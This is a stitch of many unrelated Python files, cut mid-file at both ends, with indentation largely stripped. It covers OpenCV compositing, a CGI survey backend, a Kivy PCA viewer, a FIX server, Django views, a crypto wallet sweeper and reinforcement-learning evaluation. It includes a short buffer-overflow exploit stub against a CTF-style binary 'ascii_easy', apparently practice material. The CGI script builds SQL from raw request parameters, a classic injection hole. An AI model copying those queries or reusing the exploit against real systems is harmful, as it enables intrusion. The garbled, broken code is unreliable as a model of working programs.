inverseMask = cv2.bitwise_not(mask)
imgResult2 = cv2.bitwise_and(imgCamera, imgCamera, mask = inverseMask)
imgStack = stackImages(0.6, ([imgCamera, imgCameraHSV], [mask, imgResult], [inverseMask, imgResult2]))
cv2.imshow("Stacked Images", imgStack)
success2, imgBackground = videoBackground.read()
#imgBackground = cv2.imread("C:/Users/Zac/Desktop/OpenCV/Images/beach.jpg")
#rows, cols, channels = imgBackground.shape
#print(imgBackground.shape)
    rows, cols = 480, 640
roi = imgBackground[0:rows, 0:cols ]
#print(imgBackground.shape)
#rowsBackground, colsBackground, channels = imgBackground.shape
'''
rowStart = int((rowsBackground - rows) / 2)
rowFinish = int(rowStart + rows)
colsStart = int(colsBackground - cols)
print(rowStart, rowFinish, colsStart, colsBackground)
roi = imgBackground[rowStart:rowFinish, colsStart:colsBackground]
'''
# Now create a mask of logo and create its inverse mask also
img2gray = cv2.cvtColor(imgResult2, cv2.COLOR_BGR2GRAY)
ret, mask3 = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)
mask_inv = cv2.bitwise_not(mask3)
# Now black-out the area of logo in ROI
imgBackground_bg = cv2.bitwise_and(roi,roi, mask = mask_inv)
# Take only region of logo from logo image.
imgResult2_fg = cv2.bitwise_and(imgResult2, imgResult2, mask = mask3)
# Put logo in ROI and modify the main image
dst = cv2.add(imgBackground_bg,imgResult2_fg)
imgBackground[0:rows, 0:cols ] = dst
cv2.imshow("GreenScreen?", imgBackground)
cv2.waitKey(1) |
# metadata.py
"""
File containing metadata information for WW2100 model run
"""
class UnknownFileType(BaseException):
pass
##model_run = 'MIROC'
def define_model_run():
import xlrd
model_book = xlrd.open_workbook('Master File.xls')
Refer = str(model_book.sheet_by_index(0).col_values(0)[1]) #find the reference model type
if Refer[-12:-9] == 'Ref':
reference = 'MIROC'
elif Refer[-16:-9] == 'LowClim':
reference = 'GFDL'
elif Refer[-20:-9] == 'FireSupress':
reference = 'AltFire'
elif Refer[-17:-9] == 'HighClim':
reference = 'HADLEY'
elif Refer[-16:-9] == 'HighPop':
reference = 'AltPop'
elif Refer[-18:-9] == 'UrbExpand':
reference = 'AltUGAThresh'
else:
raise UnknownFileType()
Compare = str(model_book.sheet_by_index(0).col_values(1)[1]) #find the comparative model type
if Compare[-12:-9] == 'Ref':
comparative = 'MIROC'
elif Compare[-16:-9] == 'LowClim':
comparative = 'GFDL'
elif Compare[-21:-9] == 'FireSuppress':
comparative = 'AltFire'
elif Compare[-17:-9] == 'HighClim':
comparative = 'HADLEY'
elif Compare[-16:-9] == 'HighPop':
comparative = 'AltPop'
elif Compare[-18:-9] == 'UrbExpand':
comparative = 'AltUGAThresh'
else:
raise UnknownFileType()
model_run = comparative + ' climate minus ' + reference
return model_run
model_run = define_model_run() #run the program and get the metadata
|
#!/usr/bin/env python
""" This Program returns the Data for the Header and Body Elements of a
Dynamically Generated HTML Survey Called by index.html"""
# -*- coding: UTF-8 -*-
# use the cgi library
import cgi
# enable debugging
#import cgitb
#cgitb.enable()
# use JSON encoding
import json
# use python sqlite3 database
import sqlite3
#Define Main Function
def main():
fs = cgi.FieldStorage()
svCode = fs.getvalue("SURVEY")
svPart = fs.getvalue("SVPART")
svOwner = fs.getvalue("SVOWNER")
if svCode == None:
svCode = "*"
if svPart == None:
svPart = "BOTH"
hdr_json = None
bdy_json = None
try:
# connect to the database
dbc = sqlite3.connect("data/rsp-survey.db")
dbc.row_factory = sqlite3.Row
# check for SURVEY data tables
dbc.execute('''CREATE TABLE IF NOT EXISTS SURVEY_HDR
(`SH_CODE` TEXT NOT NULL UNIQUE DEFAULT 'SRV0001',
`SH_OWNER` TEXT NOT NULL DEFAULT 'Admin',
`SH_STATUS` TEXT NOT NULL DEFAULT 'Ready',
`SH_TYPE` TEXT NOT NULL DEFAULT 'Default',
`SH_NAME` TEXT,
`SH_DESC` TEXT,
`SH_SKIN` TEXT,
PRIMARY KEY (`SH_CODE`));''')
dbc.execute('''CREATE TABLE IF NOT EXISTS SURVEY_BDY
(`SB_HDR` INTEGER NOT NULL,
`SB_SEQ` INTEGER NOT NULL,
`SB_TYPE` TEXT NOT NULL DEFAULT 'Default',
`SB_TITLE` TEXT NOT NULL,
`SB_DESC` TEXT,
`SB_LABEL` TEXT,
`SB_MIN` INTEGER DEFAULT 1,
`SB_MAX` INTEGER DEFAULT 5,
`SB_BTN_1` TEXT DEFAULT 'Submit',
`SB_BTN_2` TEXT,
`SB_BTN_3` TEXT,
PRIMARY KEY (`SB_HDR`, `SB_SEQ`));''')
dbc.commit()
# execute SQL SELECT to Create JSON Data
csr = dbc.cursor()
if svCode == "*":
csr.execute("SELECT ROWID AS SH_ROWID,* FROM SURVEY_HDR WHERE SH_OWNER='" + svOwner + "' ORDER BY SH_CODE;")
else:
csr.execute("SELECT ROWID AS SH_ROWID,* FROM SURVEY_HDR WHERE SH_CODE='" + svCode + "';")
rows = csr.fetchall()
if rows != None:
# Convert to JSON Data
hdr_json = json.dumps( [dict(idx) for idx in rows] )
if svPart != "HEADER":
bdy_json = ""
hrow = json.loads(hdr_json)
for row in hrow:
# Extract the "rowid" from the First Row to GET key to the Body
sh_rowid = row['SH_ROWID']
if sh_rowid:
csr.execute("SELECT ROWID AS SB_ROWID,* FROM SURVEY_BDY WHERE SB_HDR=" \
+ str(sh_rowid) + " ORDER BY SB_SEQ ASC")
rows = csr.fetchall()
bdy_json += json.dumps( [dict(idx) for idx in rows] )
#
# Print HTTP Response JSON
#
print "Content-Type: application/json"
print
if svPart == "HEADER":
print hdr_json
if svPart == "BODY":
print bdy_json
if svPart == "BOTH":
print '{"HEADER":' + hdr_json + ',"BODY":' + bdy_json + '}'
except sqlite3.Error, e:
# Handle Exceptions
if dbc:
dbc.rollback()
print "Content-Type: text/plain"
print
print "ERR: " + e.args[0]
finally:
if dbc:
dbc.close()
# Run The Program
main()
|
import matplotlib.pyplot as plt
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvas
from kivy.graphics.texture import Texture
from kivy.lang import Builder
from kivy.logger import Logger
from kivy.properties import NumericProperty, ObjectProperty
from kivy.uix.image import Image
from kivy.uix.screenmanager import Screen
from numpy import *
kv = '''
BoxLayout:
orientation: 'vertical'
padding: [0, 10]
Label:
text:
" Drag the slider to select the number of components you'd like to analyze.\\n" + \
"The more components you select, the more variance your dataset will have."
halign: 'center'
size_hint: (1, 0.1)
BoxLayout:
orientation: 'vertical'
size_hint: (1, 0.15)
id: num_components_select
Label:
text: "Number of components: %d" % app.pca_components
halign: 'center'
AnchorLayout:
anchor_x: 'center'
Slider:
size_hint: (.8, 1)
min: 1
max: app.maximum_pca_components
value: app.pca_components
on_value: app.pca_components = self.value
BoxLayout:
orientation: 'horizontal'
padding: [30, 30]
BoxLayout:
size_hint: (0.35, 1)
orientation: 'vertical'
BoxLayout:
orientation: 'vertical'
id: before_images
Label:
size_hint: (1, 0.2)
text: 'Original'
halign: 'center'
BoxLayout:
orientation: 'horizontal'
PCAFaceImage:
dataset: app.dataset
index: 0
PCAFaceImage:
dataset: app.dataset
index: 1
BoxLayout:
orientation: 'vertical'
id: after_images
Label:
size_hint: (1, 0.2)
text: 'Reconstruction with %d components' % app.pca_components
halign: 'center'
BoxLayout:
orientation: 'horizontal'
PCAFaceImage:
dataset: app.dataset
index: 0
pca_transformer: app.pca_transformer
PCAFaceImage:
dataset: app.dataset
index: 1
pca_transformer: app.pca_transformer
PCAGraph:
size_hint: (0.65, 1)
id: pca_graph
padding: 5
pca_data: app.pca_data
maximum_pca_components: app.maximum_pca_components
pca_components: app.pca_components
BoxLayout:
size_hint: (1, .15)
orientation: 'horizontal'
AnchorLayout:
anchor_x: 'right'
anchor_y: 'center'
padding: [10, 0]
Button:
text: 'Back'
on_press: app.go_back()
size_hint: (.6, .8)
AnchorLayout:
anchor_x: 'left'
anchor_y: 'center'
padding: [10, 0]
Button:
text: 'Next'
on_press: app.go_next()
size_hint: (.6, .8)
'''
class PCAFaceImage(Image):
dataset = ObjectProperty()
index = NumericProperty(-1)
pca_transformer = ObjectProperty()
def __init__(self, **kwargs):
super(PCAFaceImage, self).__init__(**kwargs)
self.bind(
dataset=self.plot_image,
index=self.plot_image,
pca_transformer=self.plot_image
)
def plot_image(self, instance, value):
if value is None or self.dataset is None or self.index < 0:
return
_, height, width = self.dataset['images'].shape
self.texture = Texture.create(size=(width, height), colorfmt='luminance')
image_data = self.dataset['images'][self.index]
if self.pca_transformer is not None:
if len(self.pca_transformer.mean_) != len(image_data.flatten()):
return
image_data = self.pca_transformer.reconstruct(image_data)
self.texture.blit_buffer((image_data[::-1] * 255).astype(ubyte).tostring(), colorfmt='luminance', bufferfmt='ubyte')
self.canvas.ask_update()
class PCAGraph(FigureCanvas):
maximum_pca_components = NumericProperty()
pca_components = NumericProperty()
pca_data = ObjectProperty()
def __init__(self, **kwargs):
fig, ax = plt.subplots()
super(PCAGraph, self).__init__(fig, **kwargs)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
self.ax = ax
self.bind(
maximum_pca_components=self.plot_pca_variance,
pca_components=self.plot_pca_variance,
pca_data=self.plot_pca_variance
)
def plot_pca_variance(self, instance, value):
if value is None \
or self.pca_data is None \
or self.maximum_pca_components < 0 \
or self.pca_components < 0 \
or self.pca_data.explained_variance.shape[0] != self.maximum_pca_components \
or self.pca_components >= self.maximum_pca_components:
return
Logger.debug("Updating PCA graph for max %d with %s at %d" % (
self.maximum_pca_components, str(self.pca_data.explained_variance.shape), self.pca_components))
ax = self.ax
ax.cla()
v = self.pca_data.explained_variance.cumsum()
ax.plot(arange(self.maximum_pca_components), v)
ax.set_xlabel('Number of Components')
ax.set_ylabel('Total Explained Variance')
ax.set_xlim([0, self.maximum_pca_components])
ax.set_ylim([0, 1.0])
ax.axhline(v[self.pca_components - 1], color='blue', linewidth=1)
from numpy.linalg.linalg import LinAlgError
try:
ax.axvline(self.pca_components, color='blue', linewidth=3)
except LinAlgError:
pass
self.draw()
class RunPCA(Screen):
def __init__(self, **kwargs):
super(RunPCA, self).__init__(**kwargs)
self.add_widget(Builder.load_string(kv))
|
from zio import *
target = "./ascii_easy"
def get_io(target):
read_mode = COLORED(RAW, "green")
write_mode = COLORED(RAW, "blue")
io = zio(target, timeout = 9999)#, print_read = read_mode, print_write = write_mode)
return io
def pwn(io):
#io.interact()
#io.read_until(":")
io.gdb_hint()
ebp = 'a' * 4
ret = l32(0x80000000)
payload = 'a' * 0xa8# + ebp + ret
io.write(payload + "\n")
io.interact()
io = get_io(target)
pwn(io) |
# 020
# Valid Parentheses
# 2015-04-28
#####################################################
class Solution:
# @param {string} s
# @return {boolean}
def isValid(self, s):
stack = []
for c in s:
if not stack:
stack.append(c)
elif (c == ')' and stack[-1] == '(') or (c == ']' and stack[-1] == '[') or (c == '}' and stack[-1] == '{'):
stack.pop()
else:
stack.append(c)
return not stack
#####################################################
s = "]"
print(s)
sol = Solution()
z = sol.isValid(s)
print("True" if z else "False")
|
# HRI - Keyboard Commands for Marley
#git push
import RPi.GPIO as GPIO
import time
import pygame
import RGB
from pygame.locals import *
pygame.init()
done = False
while not done:
    for event in pygame.event.get():
        # any other key event input
        if event.type == pygame.QUIT:
            done = True
        elif event.type == KEYDOWN:
            if event.key == K_ESCAPE:  # pygame defines K_ESCAPE, not K_ESC
                done = True
# get key current state
keys = pygame.key.get_pressed()
if keys[K_LEFT]:
print 'left pressed!'
|
import logging
import socket
from pyfix.journaler import DuplicateSeqNoError
from pyfix.session import FIXSession
from pyfix.connection import FIXEndPoint, ConnectionState, MessageDirection, FIXConnectionHandler
from pyfix.event import FileDescriptorEventRegistration, EventType
class FIXServerConnectionHandler(FIXConnectionHandler):
def __init__(self, engine, protocol, sock=None, addr=None, observer=None):
FIXConnectionHandler.__init__(self, engine, protocol, sock, addr, observer)
def handleSessionMessage(self, msg):
protocol = self.codec.protocol
recvSeqNo = msg[protocol.fixtags.MsgSeqNum]
msgType = msg[protocol.fixtags.MsgType]
targetCompId = msg[protocol.fixtags.TargetCompID]
senderCompId = msg[protocol.fixtags.SenderCompID]
responses = []
if msgType == protocol.msgtype.LOGON:
if self.connectionState == ConnectionState.LOGGED_IN:
logging.warning("Client session already logged in - ignoring login request")
else:
# compids are reversed here...
self.session = self.engine.getOrCreateSessionFromCompIds(senderCompId, targetCompId)
if self.session is not None:
try:
self.connectionState = ConnectionState.LOGGED_IN
self.heartbeatPeriod = float(msg[protocol.fixtags.HeartBtInt])
responses.append(protocol.messages.Messages.logon())
self.registerLoggedIn()
except DuplicateSeqNoError:
logging.error("Failed to process login request with duplicate seq no")
self.disconnect()
return
else:
logging.warning("Rejected login attempt for invalid session (SenderCompId: %s, TargetCompId: %s)" % (senderCompId, targetCompId))
self.disconnect()
return # we have to return here since self.session won't be valid
elif self.connectionState == ConnectionState.LOGGED_IN:
# compids are reversed here
if not self.session.validateCompIds(senderCompId, targetCompId):
logging.error("Received message with unexpected comp ids")
self.disconnect()
return
if msgType == protocol.msgtype.LOGOUT:
self.connectionState = ConnectionState.LOGGED_OUT
self.registerLoggedOut()
self.handle_close()
elif msgType == protocol.msgtype.TESTREQUEST:
responses.append(protocol.messages.Messages.heartbeat())
elif msgType == protocol.msgtype.RESENDREQUEST:
responses.extend(self._handleResendRequest(msg))
elif msgType == protocol.msgtype.SEQUENCERESET:
newSeqNo = msg[protocol.fixtags.NewSeqNo]
self.session.setRecvSeqNo(int(newSeqNo) - 1)
recvSeqNo = newSeqNo
else:
logging.warning("Can't process message, counterparty is not logged in")
return (recvSeqNo, responses)
class FIXServer(FIXEndPoint):
def __init__(self, engine, protocol):
FIXEndPoint.__init__(self, engine, protocol)
def start(self, host, port):
self.connections = []
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((host, port))
self.socket.listen(5)
self.serverSocketRegistration = FileDescriptorEventRegistration(self.handle_accept, self.socket, EventType.READ)
logging.debug("Awaiting Connections " + host + ":" + str(port))
self.engine.eventManager.registerHandler(self.serverSocketRegistration)
def stop(self):
logging.info("Stopping server connections")
for connection in self.connections:
connection.disconnect()
self.serverSocketRegistration.fd.close()
self.engine.eventManager.unregisterHandler(self.serverSocketRegistration)
def handle_accept(self, type, closure):
pair = self.socket.accept()
if pair is not None:
sock, addr = pair
logging.info("Connection from %s" % repr(addr))
connection = FIXServerConnectionHandler(self.engine, self.protocol, sock, addr, self)
self.connections.append(connection)
for handler in filter(lambda x: x[1] == ConnectionState.CONNECTED, self.connectionHandlers):
handler[0](connection)
|
from django.conf import settings
from rest_framework.permissions import BasePermission
class IsAuthenticated(BasePermission):
"""
    Allows access to everyone when SSO is disabled, otherwise only to authenticated users.
"""
def has_permission(self, request, view):
"""Ignore usual authentication and autherization if SSO is not enabled"""
if not settings.SSO_ENABLED:
return True
return request.user and request.user.is_authenticated
|
import time
from behave import *
use_step_matcher("parse")
@then(u'I delete the address "{address_field}"')
def step_impl(context, address_field):
from booking_manager.models import Address
address = Address.objects.filter(address_field=address_field).get()
context.browser.visit(context.get_url('delete_address', pk=address.id))
context.browser.find_by_value('Yes').click()
@then(u'I cancel to delete the address "{address_field}"')
def step_impl(context, address_field):
from booking_manager.models import Address
address = Address.objects.filter(address_field=address_field).get()
context.browser.visit(context.get_url('delete_address', pk=address.id))
context.browser.find_by_value('Cancel').click()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 29 17:33:16 2018
@author: vmueller
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from rnn_utility_functions import save_model, load_model
from matplotlib.finance import candlestick_ohlc
from matplotlib import style
import matplotlib.dates as mdates
style.use('ggplot')
# First Step is to Import Dataset
dataset = pd.read_csv('A/A_Price.csv')
dataset_train = dataset.iloc[3000:4300,:]
dataset_test = dataset.iloc[4300:,:]
delta_days = 30
# Importing the training set
training_set = dataset_train.iloc[:, 5:6].values
# Feature Scaling
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
training_set_scaled = sc.fit_transform(training_set)
loaded_model = load_model()
# Getting the real stock price
real_stock_price = dataset_test.iloc[:, 5:6].values
# Getting the predicted stock price
dataset_total = pd.concat((dataset_train['Adj Close'], dataset_test['Adj Close']), axis = 0)
inputs = dataset_total[len(dataset_total) - len(dataset_test) - delta_days:].values
inputs = inputs.reshape(-1,1)
inputs = sc.transform(inputs)
X_test = []
for i in range(delta_days, len(dataset_test) + delta_days):
X_test.append(inputs[i-delta_days:i, 0])
X_test = np.array(X_test)
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
predicted_stock_price_m = loaded_model.predict(X_test)
predicted_stock_price_m = sc.inverse_transform(predicted_stock_price_m)
# Visualising the results
plt.plot(real_stock_price, color = 'red', label = 'Real Agilent Technologies Stock Price')
plt.plot(predicted_stock_price_m, color = 'blue', label = 'Predicted Agilent Technologies Stock Price')
plt.title('Agilent Technologies (A) Price Prediction')
plt.xlabel('Time')
plt.ylabel('Agilent Technologies Stock Price')
plt.legend()
plt.show() |
from PIL import Image
from pyrandomdotorg.pyRandomdotOrg import *
SIZE_ROW = 127
SIZE_COLUMN = 127
user = ['name', 'email']
random = clientlib(user[0], user[1])
img = Image.new('RGB', (SIZE_ROW, SIZE_COLUMN), "white") # Create a new white image
pixels = img.load() # Create the pixel map
# Iterate through the pixels
for i in xrange(img.size[0]):
"""
Generate a column of RGB values. Originally, I wanted to request all of the values at the very
beginning, but random.org didn't like that. The downside to this approach of requesting column
by column is that it takes some time to generate the final image.
"""
rgb_values = random.IntegerGeneratorList(SIZE_COLUMN * 3, 0, 255)
for j in xrange(img.size[1]):
# Set the colors accordingly
pixels[i,j] = (rgb_values[j * 3],\
rgb_values[j * 3 + 1],\
rgb_values[j * 3 + 2])
img.show() |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import threading
import time
# Define the worker function
def chihuoguo(people):
    print('%s hot pot buddy - mutton: %s' % (time.ctime(), people))
    time.sleep(1)
    print('%s hot pot buddy - fish balls: %s' % (time.ctime(), people))
# Define our own thread class: subclass threading.Thread and override __init__ and run
class MyThread(threading.Thread):
def __init__(self, people, name):
        '''Override the threading.Thread initialization'''
threading.Thread.__init__(self)
self.threadName = name
self.people = people
def run(self):
        '''Override the run method'''
        print 'Starting thread ' + self.threadName
        chihuoguo(self.people)
        print 'Finished thread ' + self.threadName
thread1 = MyThread('小明', 'Thread-1')
thread2 = MyThread('小张', 'Thread-2')
thread1.start()
thread2.start()
time.sleep(0.5)
print 'Exiting main thread'
|
from celery.task import task
from wallet.models import UserWallet
from utils.web3 import Web3Util
from config.models import NodeConfig
@task()
def collect_deposit_funds():
web3 = Web3Util()
wallets = UserWallet.objects.filter(status=False)
config = NodeConfig.objects.get()
_to = config.master_wallet_address
gas_price, err = web3.get_gas_price()
if err is not None:
print(err)
if gas_price is not None:
for wallet in wallets:
balance = web3.watch_balance(wallet.wallet_address)
if balance > 0:
_from = wallet.wallet_address
gas, fee_error = web3.estimate_fee(_to, _from, balance)
if fee_error is not None:
print(_to, _from, balance, fee_error)
break
fee = gas_price * gas
                final_balance = balance - fee
message = ""
if final_balance > 0:
tx_hash, error = web3.send_from(_to,
_from,
final_balance,
wallet.reference)
if tx_hash is not None:
message = tx_hash
wallet.tx_hash = tx_hash
wallet.status = True
wallet.save()
else:
message = error
print("To {} From {} fee {} balance {} message {}".format(_to, _from, fee, final_balance, message))
else:
print("Insufficient balance to transfer original balance{} fee {} final balance {}".format(balance, fee, final_balance))
|
from aiohttp import web
from python_machine_learning.middleware import python_machine_learning_middleware
from python_machine_learning.routes import all_routes
import logging
import settings
logging.basicConfig(
format='%(asctime)s:%(levelname)s - %(message)s',
level=logging.INFO,
datefmt="%Y-%m-%d %H:%M:%S"
)
app = web.Application(middlewares=[python_machine_learning_middleware])
app.add_routes(all_routes)
def run_server():
connection_args = {
"host": settings.SERVER_HOST,
"port": settings.SERVER_PORT
}
logging.info('App run!')
web.run_app(app=app, **connection_args) |
score = input("Input your score (0.0 - 1.0): ")
sc = float(score)
if 0.0 <= sc <= 1.0:
if sc < 0.6:
print("F")
elif 0.6 <= sc < 0.7:
print("D")
elif 0.7 <= sc < 0.8:
print("C")
elif 0.8 <= sc < 0.9:
print("B")
    elif 0.9 <= sc <= 1.0:  # include 1.0 so a perfect score still earns an A
print("A")
else:
print("Value out of range.")
|
from .card import Card
from ..utility import Logger
class ItIsYourBirthday(Card):
'''
It is your birthday. Collect £10 from each player.
'''
def play(self, game, current_player):
        '''
        Each other player pays the current player £10, or £100 if they do not
        say "Happy Birthday!".
        '''
from ..game import Game
Logger.log("It is {0}'s birthday".format(current_player.name))
Logger.indent()
# We get £10 from each player...
for player in game.state.players:
if player is current_player:
continue
# We see if the player says "Happy Birthday!"...
message = player.call_ai(player.ai.players_birthday)
Logger.log("{0} says {1}".format(player.name, message))
if message == "Happy Birthday!":
amount = 10
else:
amount = 100
# We take the money from the player, and give it to
# the current player...
game.transfer_cash(player, current_player, amount, Game.Action.PAY_AS_MUCH_AS_POSSIBLE)
Logger.dedent()
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class SuningCategoryItem(scrapy.Item):
    # Category id
    CategoryId = scrapy.Field()
    # Category name
    CategoryName = scrapy.Field()
    # Parent category id
    parentId = scrapy.Field()
class SuningUrlLogItem(scrapy.Item):
    # Crawled URL
    url = scrapy.Field()
    # Crawler type
    type = scrapy.Field()
    # Title of the crawled page
    title = scrapy.Field()
    # Referer URL of the crawl
    RefererUrl = scrapy.Field()
class SuningItem(scrapy.Item):
pass
|
# Import libraries
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D, proj3d
from IPython import display
from itertools import product, combinations
import tensorflow as tf
import os
import shutil
import argparse
import time
# Import custom libraries
from ENV import Env
from ddpg import Actor, Critic, Memory
# np.random.seed(1)
# tf.set_random_seed(1)
VAR_MIN = 0.001
# Parameters
parser = argparse.ArgumentParser()
parser.add_argument('--memory', type=int, default=15000,
help='memory size for algorithm')
parser.add_argument('--batch_size', type=int, default=200,
help='minibatch size')
parser.add_argument('--lr_actor', type=float, default=1e-4,
help='learning rate for Actor network')
parser.add_argument('--lr_critic', type=float, default=1e-4,
help='learning rate for Critic network')
parser.add_argument('--target_update_a', type=int, default=1100,
help='update frequency for Actor target network')
parser.add_argument('--target_update_c', type=int, default=1000,
help='update frequency for Critic target network')
parser.add_argument('--gamma', type=float, default=0.9,
help='reward discount factor')
args = parser.parse_args()
MEMORY_CAPACITY = args.memory
BATCH_SIZE = args.batch_size
LR_A = args.lr_actor
LR_C = args.lr_critic
REPLACE_ITER_A = args.target_update_a
REPLACE_ITER_C = args.target_update_c
GAMMA = args.gamma
env = Env()
STATE_DIM = env.state_dim
ACTION_DIM = env.action_dim
ACTION_BOUND = env.action_bound
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement=True
sess = tf.Session(config=config)
# Create actor and critic.
actor = Actor(sess, ACTION_DIM, ACTION_BOUND[1], LR_A, REPLACE_ITER_A)
critic = Critic(sess, STATE_DIM, ACTION_DIM, LR_C, GAMMA, REPLACE_ITER_C, actor.a, actor.a_)
actor.add_grad_to_graph(critic.a_grads)
M = Memory(MEMORY_CAPACITY, dims=2 * STATE_DIM + ACTION_DIM + 1)
saver = tf.train.Saver()
path = './checkpoints'
saver.restore(sess, tf.train.latest_checkpoint(path))
def eval():
s = env.reset()
while True:
a = actor.choose_action(s)
s_, r, done, collision = env.step(a)
s = s_
def eval_count():
test_num = 100
succ_count = 0
succ_point = []
fail_point = []
for i in range(test_num):
s = env.reset()
point = env.point_info.copy()
print('env.point_info: ', env.point_info, 'point: ', point)
for j in range(150):
# if RENDER:
# env.render()
a = actor.choose_action(s)
s_, r, done, collision = env.step(a)
if done :#& (not collision):
succ_count += 1
succ_point.append(point)
break
else:
s = s_
if not done:
fail_point.append(point)
print('succ_point: ', succ_point)
print('fail_point: ', fail_point)
print('success cases/total test : %i/%i '%( succ_count , test_num))
def eval_plot():
pos_x = []
pos_y = []
pos_z = []
s = env.reset()
pos = env.EE.copy()
pos_x.append( env.EE.copy()[0])
pos_y.append( env.EE.copy()[1])
pos_z.append( env.EE.copy()[2])
tar = env.point_info.copy()
for j in range(150):
a = actor.choose_action(s)
s_, r, done,collision = env.step(a)
s = s_
pos_x.append( env.EE.copy()[0])
pos_y.append( env.EE.copy()[1])
pos_z.append( env.EE.copy()[2])
fig = plt.figure(figsize=(12, 8))
ax = fig.gca(projection='3d')
txt1 = ax.plot(pos_x, pos_y, pos_z, c='r' , linewidth=6, label='predicted')
txt2 = ax.scatter(tar[0], tar[1], tar[2], c='k', s = 120, label='target')
plt.title('End-effector trajectory in simulation', fontsize = 20)
ax.set_xlabel('x [cm]')
ax.set_ylabel('y [cm]')
ax.set_zlabel('z [cm]')
#draw cube
r1 = [20, 54]
r2 = [0,34]
r3 = [-66, -32]
for s, e in combinations(np.array(list(product(r1,r2,r3))), 2):
if np.sum(np.abs(s-e)) == r1[1]-r1[0]:
            ax.plot3D(*zip(s,e), color="b", linewidth=3, label='table')
plt.show()
if __name__ == '__main__':
eval_plot()
# eval()
# eval_count() |
# Product
class Vehicle(object):
__go = False # The vehicle rides or isn't moving
def __init__(self):
self._type = None
self._wheels = None
self._doors = None
self._seats = None
def get_doors(self):
return self._doors
def get_seats(self):
return self._seats
def get_wheels(self):
return self._wheels
def start(self):
self.__go = True
def stop(self):
self.__go = False
def __str__(self):
go = 'rides' if self.__go else 'is not moving'
return '{} {}'.format(self._type, go)
def view(self):
print('The vehicle "{}" consists of {} wheels, {} doors and {} seats'.\
format(self._type, self._wheels, self._doors, self._seats))
# Concrete Product 1
class Car(Vehicle):
def __init__(self):
self._type = "Car"
self._wheels = 4
self._doors = 4
self._seats = 5
# Concrete Product 2
class Bike(Vehicle):
def __init__(self):
self._type = "Bike"
self._wheels = 2
self._doors = 0
self._seats = 2
class VehicleFactory(object):
    @classmethod
    def construct_vehicle(cls, type):
if type == "Car":
return Car()
elif type == "Bike":
return Bike()
#===========================================================
if __name__ == "__main__":
car = VehicleFactory.construct_vehicle("Car")
car.view()
print(car)
car.start()
print(car)
car.stop()
print(car)
bike = VehicleFactory.construct_vehicle("Bike")
bike.view()
print(bike)
bike.start()
print(bike)
|
from __future__ import absolute_import, unicode_literals
from django.views.generic.edit import CreateView, UpdateView
from django.views.generic import DetailView
from .models import Output, LogFrame, Indicator, SubIndicator
from .forms import (OutputForm, IndicatorFormSet, SubIndicatorForm,
BaseInlineFormSetWithEmpty)
class OutputBase(object):
model = Output
form_class = OutputForm
context_object_name = 'output'
template_name = 'logframe/output_edit_form.html'
def get_context_data(self, **kwargs):
context = super(OutputBase, self).get_context_data(**kwargs)
context['milestones'] = self.get_object().log_frame.milestone_set.all()
context['indicators'] = self.create_indicator_formset()
return context
def create_indicator_formset(self, output=None):
if output is None:
output = self.get_object()
indicator_formset = IndicatorFormSet(
data=(self.request.POST if self.request.method == 'POST' else None),
instance=output,
prefix='indicator_set_ind',
initial=[
{
'name': '',
'description': '',
},
])
for i, form in enumerate(indicator_formset):
indicator = form.instance
indicator.output = output
# Subclass ModelForm for SubIndicator, to populate new (empty)
# instances of SubIndicator with the correct Indicator, so that
# they can get their Milestones.
class CustomSubIndicatorForm(SubIndicatorForm):
def __init__(self, instance=None, **kwargs):
if instance is None:
instance = SubIndicator(indicator=indicator)
super(CustomSubIndicatorForm, self).__init__(
instance=instance, **kwargs)
from django.forms.models import inlineformset_factory
SubIndicatorFormSet = inlineformset_factory(
Indicator, SubIndicator, extra=0, form=CustomSubIndicatorForm,
formset=BaseInlineFormSetWithEmpty)
if form.empty:
i = '__prefix__'
form.subindicators = SubIndicatorFormSet(
data=(self.request.POST if self.request.method == 'POST' else None),
instance=indicator,
prefix="ind-%s_subindicator_set_subind" % i,
initial=[
{'indicator_id': indicator.id}
])
for j, sif in enumerate(form.subindicators):
subindicator = sif.instance
from .forms import TargetFormSet
sif.targets = TargetFormSet(
queryset=subindicator.targets_fake_queryset,
instance=subindicator,
prefix="subindicator_%s_%d_targets" % (i, j))
return indicator_formset
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('logframe-output-update', kwargs={'pk': self.object.pk})
def form_valid(self, form):
indicator_formset = self.create_indicator_formset()
if not indicator_formset.is_valid():
return self.form_invalid(form)
if form.instance.order is None:
from django.db.models import Max
max_order = form.instance.log_frame.output_set.aggregate(Max('order'))['order__max']
if max_order is None:
new_order = 1
else:
new_order = max_order + 1
form.instance.order = new_order
# save the Output object before its dependents:
response = super(OutputBase, self).form_valid(form)
# recreate the formset now that the Output has a PK to attach to
indicator_formset = self.create_indicator_formset(self.object)
if not indicator_formset.is_valid():
# we validated all the parameters earlier!
raise AssertionError('The formset was valid but no longer is')
indicator_formset.save()
for form in indicator_formset:
# TODO: add stuff for when forms aren't valid
if form.subindicators.is_valid():
form.subindicators.save()
for sif in form.subindicators:
if sif.targets.is_valid():
sif.targets.save()
return response
class OutputCreate(OutputBase, CreateView):
# We should really create the Output object in the database, with a
# foreign key back to its own LogFrame before we start editing it; or
# else find a way to pass the correct LogFrame ID into this view and
# validate it here (same owner etc.) This is a stopgap until we have
# real support for creating LogFrames in the web interface.
def __init__(self, **kwargs):
super(OutputCreate, self).__init__(**kwargs)
# TODO: the logframe id should be an argument to the view
self.default_log_frame = LogFrame.objects.first()
def get_form_kwargs(self):
kwargs = super(OutputCreate, self).get_form_kwargs()
